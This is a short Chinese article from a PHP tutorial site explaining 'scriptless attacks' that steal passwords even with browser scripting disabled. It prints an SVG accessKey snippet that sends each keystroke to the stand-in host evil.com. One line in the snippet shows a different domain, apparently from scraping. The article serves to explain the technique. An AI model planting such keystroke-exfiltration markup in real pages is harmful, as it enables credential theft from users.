来源:自学PHP网 时间:2015-04-17 11:59 作者: 阅读:次
[导读] 由于企业安全意识和技术水平的不断提升,针对服务器端的攻击变得越来越困难,这些年黑客越来越重视客户端攻击技术的运用,跨站脚本攻击(XSS)就是其中研究和运用较多的一种技...
|
由于企业安全意识和技术水平的不断提升,针对服务器端的攻击变得越来越困难,这些年黑客越来越重视客户端攻击技术的运用,跨站脚本攻击(XSS)就是其中研究和运用较多的一种技术。为了防范类似的攻击,安全机构研究出了各种检测恶意脚本的方法,Firefox甚至推出了 NoScript插件完全阻止客户端脚本的运行(除非客户端明确授权)。
最近,有国外研究人员提出了客户端无脚本攻击(Scriptless Attacks)技术,在客户端完全禁止脚本运行的情况下,也能实现客户端帐号、口令等敏感个人信息的窃取,这种新的攻击技术的出现立刻引起了安全人士的浓厚兴趣。
那么,攻击者如何在客户端完全禁止脚本运行的条件下实现攻击呢?其实这跟浏览器越来越丰富的功能有关。比如SVG可缩放矢量图形(Scalable Vector Graphics),这是国际互联网标准组织W3C提出的基于可扩展标记语言(XML),用于描述二维矢量图形的一种图形格式。使用SVG可以通过文本来实现图形的生成和处理,大大提高了浏览器在处理图像信息过程中的交互性和动态效果。Accesskey是SVG中定义的一个操作功能,当浏览器捕捉到击键信息时会触发这个功能,本意主要是提供图形操作的便捷方式,不过利用这个功能,攻击者也就很容易实现恶意的击键记录。以下是实现击键记录的部分代码片段,来自 http://web2hack.org/blog/?p=89 :
<set attributeName=”xlink:href” begin=”accessKey(a)” to=”//evil.com/?a” />
<set attributeName=”xlink:href” begin=”accessKey(b)” to=”//evil.com/?b” />
<set attributeName=”xlink:href” begin=”accessKey(c)” to=”// www.2cto.com /?c” />
<set attributeName=”xlink:href” begin=”accessKey(d)” to=”//evil.com/?d” />
以上只是无脚本攻击的一个典型例子,攻击者还可以利用基于CSS的多种特效实现更多的攻击,由于篇幅所限就不在这里一一描述了
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
